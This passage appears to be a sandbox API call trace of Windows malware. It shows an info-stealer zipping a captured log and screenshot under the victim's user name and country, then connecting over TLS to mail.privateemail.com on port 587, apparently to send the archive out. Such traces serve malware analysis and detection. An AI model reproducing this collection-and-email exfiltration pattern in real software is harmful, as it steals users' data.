lpBuffer=0x615bd84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\aETAdzjz_United States_A8D24E6933_08-04-2020 23.28.13.zip", lpFilePart=0x0) returned 0x64 [0237.784] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c1e0) returned 1 [0237.784] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\aETAdzjz_United States_A8D24E6933_08-04-2020 23.28.13.zip" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933\\aetadzjz_united states_a8d24e6933_08-04-2020 23.28.13.zip"), fInfoLevelId=0x0, lpFileInformation=0x615c25c | out: lpFileInformation=0x615c25c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.784] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c1dc) returned 1 [0237.784] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\aETAdzjz_United States_A8D24E6933_08-04-2020 23.28.13.zip", nBufferLength=0x105, lpBuffer=0x615bd8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\aETAdzjz_United States_A8D24E6933_08-04-2020 23.28.13.zip", lpFilePart=0x0) returned 0x64 [0237.784] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c1ec) returned 1 [0237.785] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\aETAdzjz_United States_A8D24E6933_08-04-2020 23.28.13.zip" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933\\aetadzjz_united states_a8d24e6933_08-04-2020 23.28.13.zip"), fInfoLevelId=0x0, lpFileInformation=0x615c268 | out: lpFileInformation=0x615c268*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.785] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c1e8) returned 1 [0237.797] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\aETAdzjz_United States_A8D24E6933_08-04-2020 23.28.13.zip", nBufferLength=0x105, lpBuffer=0x615bd24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\aETAdzjz_United States_A8D24E6933_08-04-2020 23.28.13.zip", lpFilePart=0x0) returned 0x64 [0237.798] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\DotNetZip-trk1nfn0.tmp", nBufferLength=0x105, lpBuffer=0x615bc10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\DotNetZip-trk1nfn0.tmp", lpFilePart=0x0) returned 0x41 [0237.798] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c104) returned 1 [0237.798] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\DotNetZip-trk1nfn0.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933\\dotnetzip-trk1nfn0.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x478 [0237.798] GetFileType (hFile=0x478) returned 0x1 [0237.799] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c100) returned 1 [0237.799] GetFileType (hFile=0x478) returned 0x1 [0237.817] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Log.txt", nBufferLength=0x105, lpBuffer=0x615bbd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Log.txt", lpFilePart=0x0) returned 0x32 [0237.817] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c038) returned 1 [0237.818] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Log.txt" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933\\log.txt"), fInfoLevelId=0x0, lpFileInformation=0x615c0b4 | out: lpFileInformation=0x615c0b4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec7931b0, ftCreationTime.dwHighDateTime=0x1d66ab6, ftLastAccessTime.dwLowDateTime=0xec7931b0, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0xec8779f0, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0x549)) returned 1 [0237.818] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c034) returned 1 [0237.818] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Log.txt", nBufferLength=0x105, lpBuffer=0x615bb0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Log.txt", lpFilePart=0x0) returned 0x32 [0237.818] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c000) returned 1 [0237.818] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Log.txt" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933\\log.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x46c [0237.818] GetFileType (hFile=0x46c) returned 0x1 [0237.818] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615bffc) returned 1 [0237.818] GetFileType (hFile=0x46c) returned 0x1 [0237.818] GetFileSize (in: hFile=0x46c, lpFileSizeHigh=0x615c0f0 | out: lpFileSizeHigh=0x615c0f0*=0x0) returned 0x549 [0237.818] CloseHandle (hObject=0x46c) returned 1 [0237.821] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Log.txt", nBufferLength=0x105, lpBuffer=0x615bb9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Log.txt", lpFilePart=0x0) returned 0x32 [0237.821] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c090) returned 1 [0237.822] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Log.txt" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933\\log.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x46c [0237.822] GetFileType (hFile=0x46c) returned 0x1 [0237.822] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c08c) returned 1 [0237.822] GetFileType (hFile=0x46c) returned 0x1 [0237.822] GetFileSize (in: hFile=0x46c, lpFileSizeHigh=0x615c180 | out: lpFileSizeHigh=0x615c180*=0x0) returned 0x549 [0237.828] ReadFile (in: hFile=0x46c, lpBuffer=0x27a2af4, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x615c0e8, lpOverlapped=0x0 | out: lpBuffer=0x27a2af4*, lpNumberOfBytesRead=0x615c0e8*=0x549, lpOverlapped=0x0) returned 1 [0237.843] ReadFile (in: hFile=0x46c, lpBuffer=0x27a2af4, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x615c0e8, lpOverlapped=0x0 | out: lpBuffer=0x27a2af4*, lpNumberOfBytesRead=0x615c0e8*=0x0, lpOverlapped=0x0) returned 1 [0237.858] CloseHandle (hObject=0x46c) returned 1 [0237.864] SetFilePointer (in: hFile=0x478, lDistanceToMove=120, lpDistanceToMoveHigh=0x615c03c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x615c03c*=0) returned 0x78 [0237.864] WriteFile (in: hFile=0x478, lpBuffer=0x27a11b8*, nNumberOfBytesToWrite=0x7f, lpNumberOfBytesWritten=0x615c028, lpOverlapped=0x0 | out: lpBuffer=0x27a11b8*, lpNumberOfBytesWritten=0x615c028*=0x7f, lpOverlapped=0x0) returned 1 [0237.865] SetFilePointer (in: hFile=0x478, lDistanceToMove=672, lpDistanceToMoveHigh=0x615c03c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x615c03c*=0) returned 0x397 [0237.865] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Screenshot.jpeg", nBufferLength=0x105, lpBuffer=0x615bbd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Screenshot.jpeg", lpFilePart=0x0) returned 0x3a [0237.865] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c038) returned 1 [0237.865] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Screenshot.jpeg" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933\\screenshot.jpeg"), fInfoLevelId=0x0, lpFileInformation=0x615c0b4 | out: lpFileInformation=0x615c0b4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb8feaf0, ftCreationTime.dwHighDateTime=0x1d66ab6, ftLastAccessTime.dwLowDateTime=0xeb8feaf0, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0xeb8feaf0, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0xc8c3)) returned 1 [0237.865] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c034) returned 1 [0237.865] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Screenshot.jpeg", nBufferLength=0x105, lpBuffer=0x615bb0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Screenshot.jpeg", lpFilePart=0x0) returned 0x3a [0237.866] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c000) returned 1 [0237.866] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Screenshot.jpeg" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933\\screenshot.jpeg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x46c [0237.866] GetFileType (hFile=0x46c) returned 0x1 [0237.866] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615bffc) returned 1 [0237.866] GetFileType (hFile=0x46c) returned 0x1 [0237.866] GetFileSize (in: hFile=0x46c, lpFileSizeHigh=0x615c0f0 | out: lpFileSizeHigh=0x615c0f0*=0x0) returned 0xc8c3 [0237.866] CloseHandle (hObject=0x46c) returned 1 [0237.866] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Screenshot.jpeg", nBufferLength=0x105, lpBuffer=0x615bb9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Screenshot.jpeg", lpFilePart=0x0) returned 0x3a [0237.866] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c090) returned 1 [0237.866] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\Screenshot.jpeg" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933\\screenshot.jpeg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x46c [0237.867] GetFileType (hFile=0x46c) returned 0x1 [0237.867] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c08c) returned 1 [0237.867] GetFileType (hFile=0x46c) returned 0x1 [0237.867] GetFileSize (in: hFile=0x46c, lpFileSizeHigh=0x615c180 | out: lpFileSizeHigh=0x615c180*=0x0) returned 0xc8c3 [0237.867] ReadFile (in: hFile=0x46c, lpBuffer=0x27f1c6c, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x615c0e8, lpOverlapped=0x0 | out: lpBuffer=0x27f1c6c*, lpNumberOfBytesRead=0x615c0e8*=0x8000, lpOverlapped=0x0) returned 1 [0237.877] WriteFile (in: hFile=0x478, lpBuffer=0x27a11b8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x615c0fc, lpOverlapped=0x0 | out: lpBuffer=0x27a11b8*, lpNumberOfBytesWritten=0x615c0fc*=0x1000, lpOverlapped=0x0) returned 1 [0237.877] WriteFile (in: hFile=0x478, lpBuffer=0x283c3c1*, nNumberOfBytesToWrite=0x3087, lpNumberOfBytesWritten=0x615c0fc, lpOverlapped=0x0 | out: lpBuffer=0x283c3c1*, lpNumberOfBytesWritten=0x615c0fc*=0x3087, lpOverlapped=0x0) returned 1 [0237.878] ReadFile (in: hFile=0x46c, lpBuffer=0x27f1c6c, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x615c0e8, lpOverlapped=0x0 | out: lpBuffer=0x27f1c6c*, lpNumberOfBytesRead=0x615c0e8*=0x48c3, lpOverlapped=0x0) returned 1 [0237.879] WriteFile (in: hFile=0x478, lpBuffer=0x27a11b8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x615c0fc, lpOverlapped=0x0 | out: lpBuffer=0x27a11b8*, lpNumberOfBytesWritten=0x615c0fc*=0x1000, lpOverlapped=0x0) returned 1 [0237.880] WriteFile (in: hFile=0x478, lpBuffer=0x283bcf6*, nNumberOfBytesToWrite=0x3752, lpNumberOfBytesWritten=0x615c0fc, lpOverlapped=0x0 | out: lpBuffer=0x283bcf6*, lpNumberOfBytesWritten=0x615c0fc*=0x3752, lpOverlapped=0x0) returned 1 [0237.880] ReadFile (in: hFile=0x46c, lpBuffer=0x27f1c6c, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x615c0e8, lpOverlapped=0x0 | out: lpBuffer=0x27f1c6c*, lpNumberOfBytesRead=0x615c0e8*=0x0, lpOverlapped=0x0) returned 1 [0237.880] WriteFile (in: hFile=0x478, lpBuffer=0x27a11b8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x615c060, lpOverlapped=0x0 | out: lpBuffer=0x27a11b8*, lpNumberOfBytesWritten=0x615c060*=0x1000, lpOverlapped=0x0) returned 1 [0237.881] WriteFile (in: hFile=0x478, lpBuffer=0x27a11b8*, nNumberOfBytesToWrite=0x5fb, lpNumberOfBytesWritten=0x615c060, lpOverlapped=0x0 | out: lpBuffer=0x27a11b8*, lpNumberOfBytesWritten=0x615c060*=0x5fb, lpOverlapped=0x0) returned 1 [0237.881] CloseHandle (hObject=0x46c) returned 1 [0237.881] SetFilePointer (in: hFile=0x478, lDistanceToMove=919, lpDistanceToMoveHigh=0x615c03c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x615c03c*=0) returned 0x397 [0237.881] WriteFile (in: hFile=0x478, lpBuffer=0x27a11b8*, nNumberOfBytesToWrite=0x87, lpNumberOfBytesWritten=0x615c028, lpOverlapped=0x0 | out: lpBuffer=0x27a11b8*, lpNumberOfBytesWritten=0x615c028*=0x87, lpOverlapped=0x0) returned 1 [0237.881] SetFilePointer (in: hFile=0x478, lDistanceToMove=40269, lpDistanceToMoveHigh=0x615c03c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x615c03c*=0) returned 0xa16b [0237.894] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\aETAdzjz_United States_A8D24E6933_08-04-2020 23.28.13.zip", nBufferLength=0x105, lpBuffer=0x615bd40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\aETAdzjz_United States_A8D24E6933_08-04-2020 23.28.13.zip", lpFilePart=0x0) returned 0x64 [0237.894] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c1a0) returned 1 [0237.894] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\aETAdzjz_United States_A8D24E6933_08-04-2020 23.28.13.zip" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933\\aetadzjz_united states_a8d24e6933_08-04-2020 23.28.13.zip"), fInfoLevelId=0x0, lpFileInformation=0x615c21c | out: lpFileInformation=0x615c21c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.894] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c19c) returned 1 [0237.894] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\DotNetZip-trk1nfn0.tmp", nBufferLength=0x105, lpBuffer=0x615bd4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\DotNetZip-trk1nfn0.tmp", lpFilePart=0x0) returned 0x41 [0237.894] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\aETAdzjz_United States_A8D24E6933_08-04-2020 23.28.13.zip", nBufferLength=0x105, lpBuffer=0x615bd4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\aETAdzjz_United States_A8D24E6933_08-04-2020 23.28.13.zip", lpFilePart=0x0) returned 0x64 [0237.895] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c1ac) returned 1 [0237.895] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\DotNetZip-trk1nfn0.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933\\dotnetzip-trk1nfn0.tmp"), fInfoLevelId=0x0, lpFileInformation=0x615c228 | out: lpFileInformation=0x615c228*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeca1a910, ftCreationTime.dwHighDateTime=0x1d66ab6, ftLastAccessTime.dwLowDateTime=0xeca1a910, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0xecaff150, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0xa32f)) returned 1 [0237.895] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c1a8) returned 1 [0237.895] MoveFileW (lpExistingFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\DotNetZip-trk1nfn0.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933\\dotnetzip-trk1nfn0.tmp"), lpNewFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\aETAdzjz_United States_A8D24E6933_08-04-2020 23.28.13.zip" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933\\aetadzjz_united states_a8d24e6933_08-04-2020 23.28.13.zip")) returned 1 [0237.898] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\DotNetZip-trk1nfn0.tmp", nBufferLength=0x105, lpBuffer=0x615bcf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\DotNetZip-trk1nfn0.tmp", lpFilePart=0x0) returned 0x41 [0237.898] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c158) returned 1 [0237.898] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\DotNetZip-trk1nfn0.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933\\dotnetzip-trk1nfn0.tmp"), fInfoLevelId=0x0, lpFileInformation=0x615c1d4 | out: lpFileInformation=0x615c1d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.898] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c154) returned 1 [0237.937] GetCurrentProcess () returned 0xffffffff [0237.937] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x615be50 | out: TokenHandle=0x615be50*=0x478) returned 1 [0237.940] GetCurrentProcess () returned 0xffffffff [0237.940] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x615be60 | out: TokenHandle=0x615be60*=0x46c) returned 1 [0237.966] GetUserNameW (in: lpBuffer=0x615bff8, pcbBuffer=0x615c270 | out: lpBuffer="aETAdzjz", pcbBuffer=0x615c270) returned 1 [0237.969] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\aETAdzjz_United States_A8D24E6933_08-04-2020 23.28.13.zip", nBufferLength=0x105, lpBuffer=0x615bc58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\aETAdzjz_United States_A8D24E6933_08-04-2020 23.28.13.zip", lpFilePart=0x0) returned 0x64 [0237.969] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c14c) returned 1 [0237.969] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\aETAdzjz_United States_A8D24E6933_08-04-2020 23.28.13.zip" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933\\aetadzjz_united states_a8d24e6933_08-04-2020 23.28.13.zip"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x470 [0237.969] GetFileType (hFile=0x470) returned 0x1 [0237.970] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c148) returned 1 [0237.970] GetFileType (hFile=0x470) returned 0x1 [0238.011] SysStringLen (param_1=")||LHNUQ5wgcszg") returned 0x10 [0238.011] SystemFunction040 (in: Memory=0x7f6d14, MemorySize=0x20, OptionFlags=0x0 | out: Memory=0x7f6d14) returned 0x0 [0238.024] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x460 [0238.025] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x45c [0238.025] SetEvent (hEvent=0x244) returned 1 [0238.026] ReleaseMutex (hMutex=0x45c) returned 1 [0238.026] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x464 [0238.026] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x254 [0238.026] GetAddrInfoW (in: pNodeName="mail.privateemail.com", pServiceName=0x0, pHints=0x615bfa4*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x615bf4c | out: ppResult=0x615bf4c*=0x4b737e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="mail.privateemail.com", ai_addr=0x4b9b530*(sa_family=2, sin_port=0x0, sin_addr="198.54.122.60"), ai_next=0x0)) returned 0 [0238.065] FreeAddrInfoW (pAddrInfo=0x4b737e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="mail.privateemail.com", ai_addr=0x4b9b530*(sa_family=2, sin_port=0x0, sin_addr="198.54.122.60"), ai_next=0x0)) [0238.066] WSAConnect (in: s=0x464, name=0x284caa8*(sa_family=2, sin_port=0x24b, sin_addr="198.54.122.60"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0238.242] closesocket (s=0x254) returned 0 [0238.242] setsockopt (s=0x464, level=6, optname=1, optval="\x01", optlen=4) returned 0 [0238.243] recv (in: s=0x464, buf=0x284cb20, len=256, flags=0 | out: buf=0x284cb20*) returned 32 [0238.416] send (s=0x464, buf=0x284b840*, len=14, flags=0) returned 14 [0238.416] recv (in: s=0x464, buf=0x284cb20, len=256, flags=0 | out: buf=0x284cb20*) returned 149 [0238.590] send (s=0x464, buf=0x284b840*, len=10, flags=0) returned 10 [0238.590] recv (in: s=0x464, buf=0x284cb20, len=256, flags=0 | out: buf=0x284cb20*) returned 24 [0238.778] EnumerateSecurityPackagesW (in: pcPackages=0x615bfec, ppPackageInfo=0x615bf80 | out: pcPackages=0x615bfec, ppPackageInfo=0x615bf80) returned 0x0 [0238.781] FreeContextBuffer (in: pvContextBuffer=0x4b76888 | out: pvContextBuffer=0x4b76888) returned 0x0 [0238.788] GetCurrentProcess () returned 0xffffffff [0238.788] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x615bdcc | out: TokenHandle=0x615bdcc*=0x254) returned 1 [0238.789] AcquireCredentialsHandleW (in: pPrincipal=0x0, pPackage=0x284dd98, fCredentialUse=0x2, pvLogonId=0x0, pAuthData=0x615be20, pGetKeyFn=0x0, pvGetKeyArgument=0x0, phCredential=0x284f290, ptsExpiry=0x615bda4 | out: phCredential=0x284f290, ptsExpiry=0x615bda4) returned 0x0 [0239.010] InitializeSecurityContextW (in: phCredential=0x615bde4, phContext=0x0, pTargetName=0x264477c, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x284f484, pOutput=0x284f41c, pfContextAttr=0x284dd6c, ptsExpiry=0x615bddc | out: phNewContext=0x284f484, pOutput=0x284f41c, pfContextAttr=0x284dd6c, ptsExpiry=0x615bddc) returned 0x90312 [0239.011] FreeContextBuffer (in: pvContextBuffer=0x7ec708 | out: pvContextBuffer=0x7ec708) returned 0x0 [0239.012] send (s=0x464, buf=0x284f498*, len=163, flags=0) returned 163 [0239.015] recv (in: s=0x464, buf=0x284f498, len=5, flags=0 | out: buf=0x284f498*) returned 5 [0239.184] recv (in: s=0x464, buf=0x284f49d, len=87, flags=0 | out: buf=0x284f49d*) returned 87 [0239.185] InitializeSecurityContextW (in: phCredential=0x615bd48, phContext=0x615bdd4, pTargetName=0x264477c, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x284f6c8, Reserved2=0x0, phNewContext=0x284f484, pOutput=0x284f6dc, pfContextAttr=0x284dd6c, ptsExpiry=0x615bd40 | out: phNewContext=0x284f484, pOutput=0x284f6dc, pfContextAttr=0x284dd6c, ptsExpiry=0x615bd40) returned 0x90312 [0239.186] recv (in: s=0x464, buf=0x284f76c, len=5, flags=0 | out: buf=0x284f76c*) returned 5 [0239.186] recv (in: s=0x464, buf=0x284f785, len=4816, flags=0 | out: buf=0x284f785*) returned 4816 [0239.186] InitializeSecurityContextW (in: phCredential=0x615bcb0, phContext=0x615bd3c, pTargetName=0x264477c, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2850ac8, Reserved2=0x0, phNewContext=0x284f484, pOutput=0x2850adc, pfContextAttr=0x284dd6c, ptsExpiry=0x615bca8 | out: phNewContext=0x284f484, pOutput=0x2850adc, pfContextAttr=0x284dd6c, ptsExpiry=0x615bca8) returned 0x90312 [0239.187] recv (in: s=0x464, buf=0x2850b6c, len=5, flags=0 | out: buf=0x2850b6c*) returned 5 [0239.187] recv (in: s=0x464, buf=0x2850b85, len=333, flags=0 | out: buf=0x2850b85*) returned 333 [0239.187] InitializeSecurityContextW (in: phCredential=0x615bc18, phContext=0x615bca4, pTargetName=0x264477c, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2850d44, Reserved2=0x0, phNewContext=0x284f484, pOutput=0x2850d58, pfContextAttr=0x284dd6c, ptsExpiry=0x615bc10 | out: phNewContext=0x284f484, pOutput=0x2850d58, pfContextAttr=0x284dd6c, ptsExpiry=0x615bc10) returned 0x90312 [0239.187] recv (in: s=0x464, buf=0x2850de8, len=5, flags=0 | out: buf=0x2850de8*) returned 5 [0239.187] recv 